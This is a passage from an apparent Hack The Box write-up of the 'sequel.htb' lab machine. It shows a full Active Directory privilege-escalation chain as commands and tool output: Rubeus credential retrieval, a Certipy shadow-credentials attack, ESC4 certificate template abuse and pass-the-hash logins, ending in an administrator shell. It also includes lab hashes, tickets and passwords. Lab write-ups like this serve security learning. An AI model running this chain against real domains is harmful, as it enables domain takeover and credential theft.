tCz9BuW+PRDJSNTLtphENW6+8cuOMMP1QmEnz78TouqjV/oGK+jZxbT+IueASXIjB3WBUsl/yCVoFp4dwmt4fUNXJEoBCpKW0xBg59QqC24aJsmZEnCFU9Mm7x0D1+Dcags9MY+XUZ1ay7XC5ucQ0Krnjj1J3iC4xCy6aBFqVec4HfylkJq4YmbdCuvExbTaKzyLSOIMd97aw4q3tZfhWRMQBezDwrlV/3htNHc2+LGF6w9yUNLlCcnaTK7ADnokGT+886KU4mkbq6yrXUsKEA7dDNSvxFNjF+fimIrUbfJtjK+fvsoD9uNlb59CNpkWqjbMArg0mzkVfy9BoO9wi2VgIoXeST8T7/FkiKR+NUDhQ85vlRcWInLDIZbh08PQfGlpb+mL6oLNCY2Rj80dWeE/NtbyHGVXqlTrggAPAx9IBG72KQWESP0m5VgHQhZQzc0uwGcshMmhQkWl3D/R9IVHe3dwWM8qDw/JHruySok1gl2+b1yJBJ7wZYYhPfvgq5mB6hIn610PfG+iDOe3QS5jQBPDrZb40TPMF96PLJhYUXCe+PyjJHOSlKuEOfkKOSoahsoU7HgeQCU1JtdFwZOuuSASpOK6IZ8B2B+dMDswHzAHBgUrDgMCGgQUpFUYG/5pGpBByxbdApddPwYV3xIEFMq424HXOS5CTqRBJzIFDzldelfhAgIH0A== /password:"JSVbHTvuGtaRz03f" /domain:sequel.htb /dc:DC01.sequel.htb /getcredentials /show
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=ca_svc
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\ca_svc'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGQjCCBj6gAwIBBaEDAgEWooIFXzCCBVthggVXMIIFU6ADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUbMIIFF6ADAgESoQMCAQKiggUJBIIFBYkhmYC1u2g9
ZvO20ZySRbhJBWO/uRDyewdiY40aKLnz0nv/u5Qsr/1QY5qxbuaJY0arbDjzt5csJWEP1m+mtFOVcUk+
wbyOxjewmQDJ+YzWyLFpfFrL3D40EQC/jwLWJ6ohk6+55k3sOX8IWT953knVC/xaCg2jz6zxzw7Etun/
AgJvHXpxFipRYY1VzFr9F5jzQUnySBTgtjSbg1cwHW/awtEKQjDnF3XW6HRFTYi4xawQ99cvByOdEd20
qLZHCu7jdeb+M3ykR9kbgicwx79hFsUPNWAzcLaTWe1CwCSFhuWF/GEGaOTIr1Srej+MAVRxXMKGpNNB
+9636/+d0pQCEk9OHw648AjGnCuhTSofBdpjK8Up7lYUdpYARA+MIFszlUbWJOUzkSvvXA7LRoVyKVsv
p6iHZBmAESYFPDTaU3SDykun0XxKq50Ddcjkf/Nc8BsSosCLuc/3YP/nvOiIOu8TDI9ZsENjrNx7Xjtx
VAoj8rHihHQOVzGPKW0gchpmb8LI0ataa1Qmp8a8+PEAVmsQd/MsLdE7RYn/bhexgFAirLO1/qE+atAb
olPY6qHXyQ6CcrnnZ3GDyzkkdC4I/w2lXr6O+vf4kEWZOs/eERiLv0eVBAPUY1TuCnwbg995GLQUcdAc
OSmASi5NhoPkTLkvzkBloHrfgR1RumGXxk+kv08Tiy6wKhC207Ryeqztl1U9WX6Ze35Ri2vZ9kbL+dPH
IZIdqYFw/g3WWZ1BKubZL7NREavTU7rAHV6MXV4mrRMqBODkKRXzPTMI+BCy2UtjuQJ4emVF3F9STSc0
yUBz4+23WbIPKj8gC+LCfQO/LThmrf7zrmpABw4zKu6Mvq7fpSiKmlYwXxib+Y/MEVF8lP9J+bEA0RIU
DBMPBB+AePePCHfMgF+CFtvE13CIZFptVkM1BTvUWZHxE5zp7Mcx35wBXU3OZJOAYj/dzRJiQl53YFAH
HtoCJOZqYAkTlgfNMfgLlYfUcRsgUjveB8eewDDk5BtP1ETftb/lngOJw04A8Pf4Rt2MJbsOcxokViQQ
ViuGOMwhTe0WD3OjC7LkOIIrZycQK+KDI3fD7EVjf36P+hysu5PUFWRIF2lDWuCt0wOaFiRGkGx/ZO5v
emGTyeIfz8vq7u8YZntmca7+ygL4PkgI1QFcw6WMufjDIVH/FEluO1UK53zH2vWgzQzZ6pV6kJCLa3VT
Ai8tNaQJuMjo4eSgLr4u+dIIlcCAhnkrK0QJ7cd8AVc//LHd0nTGfeJE0jBn641+rI0WI0U1ub8NwfyI
EVkFZ1M2MALVAlh+IXy4vnpvdIp2h5pdLb9dB1Zt6fX9v6lCPRKJSf6vtbbOnDNff4qGd8p+9LAa58Em
3byczkJBGkyWpwcmJ2UchJwZc56c9SqPoPz3zES7G6Pb4D4kt5tjaVVWqJ/cP7rCxKcQcFTiiUGiv56F
NsaQhWf54b+lAqRSuBH4FnSrhgGgNUA4TPoq3/vICOpw0RC3hnFECCsDZVLiIKTJOHI+V4knuPodWsGE
+j999Qii1sDyxR+7/OO5jqSSEbWiUUxEFnG9x9nQFJi0m5Q9HfQ6MzanVoVHQKR1GW9LcGjbNJ1naqnE
QRD+/gp9SdmBspnDHecIP4rPpbdsLFKbfUWR/7b8HIb00YsL6+e3ZJCl/X9Beu8dMAGP3OSl13iW8346
Fm1EQchEvXn/RTxXQ5EZqAmjgc4wgcugAwIBAKKBwwSBwH2BvTCBuqCBtzCBtDCBsaAbMBmgAwIBF6ES
BBCWjz/GXALJ7+1QaZfFZsTIoQwbClNFUVVFTC5IVEKiEzARoAMCAQGhCjAIGwZjYV9zdmOjBwMFAEDh
AAClERgPMjAyNTAxMTEyMjQxMjFaphEYDzIwMjUwMTEyMDg0MTIxWqcRGA8yMDI1MDExODIyNDEyMVqo
DBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : ca_svc
UserRealm : SEQUEL.HTB
StartTime : 1/11/2025 2:41:21 PM
EndTime : 1/12/2025 12:41:21 AM
RenewTill : 1/18/2025 2:41:21 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : lo8/xlwCye/tUGmXxWbEyA==
ASREP (key) : 97A5B84E9E715B3F8C0C2EAB6E56DBCB
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 3B181B914E7A9D5508EA1E20BC2B7FCEFrom the future, typo in the domain name failed the whole shadow credentials attack from outside.... sooo.... yeah. sequel, not sequal !
└─$ certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account ca_svc -target sequel.htb -dc-ip 10.129.164.144
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '105debfa-0570-7a0f-d577-cfb215902484'
[*] Adding Key Credential with device ID '105debfa-0570-7a0f-d577-cfb215902484' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '105debfa-0570-7a0f-d577-cfb215902484' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fceSuccess
└─$ netexec smb 10.129.221.78 -u 'ca_svc' -H '3B181B914E7A9D5508EA1E20BC2B7FCE'
SMB 10.129.221.78 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.221.78 445 DC01 [+] sequel.htb\ca_svc:3B181B914E7A9D5508EA1E20BC2B7FCENote: Do not reset password with any commands, just shadow credentials attack the original password which will not change through the box.
Privilege Escalation (Administrator)
ESC4
└─$ certipy-ad find -vulnerable -u 'ca_svc@sequal.htb' -hashes '3B181B914E7A9D5508EA1E20BC2B7FCE' -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: Could not connect: [Errno 113] No route to host
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via RRP: [Errno Connection error (10.129.228.253:445)] [Errno 113] No route to host
[!] Failed to get CA configuration for 'sequel-DC01-CA'
[!] Got error while trying to check for web enrollment: [Errno 113] No route to host
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissionshttps://github.com/ly4k/Certipy?tab=readme-ov-file#esc4https://www.thehacker.recipes/ad/movement/adcs/access-controls#certificate-templates-esc4
certipy-ad template -username 'ca_svc@sequal.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication -save-old
certipy-ad template -username 'ca_svc@sequal.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication
certipy-ad req -username 'ca_svc@sequal.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -ca sequel-DC01-CA -target dc01.sequal.htb -template DunderMifflinAuthentication -upn administrator@sequal.htb -timeout 1000
certipy-ad auth -pfx administrator.pfx -username 'Administrator' -domain sequal.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 8
[*] Got certificate with UPN 'administrator@sequal.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequal.htb
[*] Trying to get TGT...
[-] Wrong domain name specified 'sequal.htb'
[-] Verify that the domain 'sequal.htb' matches the certificate UPN: administrator@sequal.htbauth fails for some reason again due to kerberos...
Skill issue 💀 It should have been sequel, not sequal....................................................
└─$ certipy-ad template -username 'ca_svc@sequel.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication -save-old
certipy-ad template -username 'ca_svc@sequel.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -template DunderMifflinAuthentication
certipy-ad req -username 'ca_svc@sequel.htb' -hashes ':3B181B914E7A9D5508EA1E20BC2B7FCE' -ca sequel-DC01-CA -target dc01.sequel.htb -template DunderMifflinAuthentication -upn administrator@sequel.htb -timeout 100
certipy-ad auth -pfx administrator.pfx -username 'Administrator' -domain sequel.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ffRoot.txt
└─$ evil-winrm -i sequel.htb -u administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
f343878d88bc4ccec915441b7a779c6dLast updated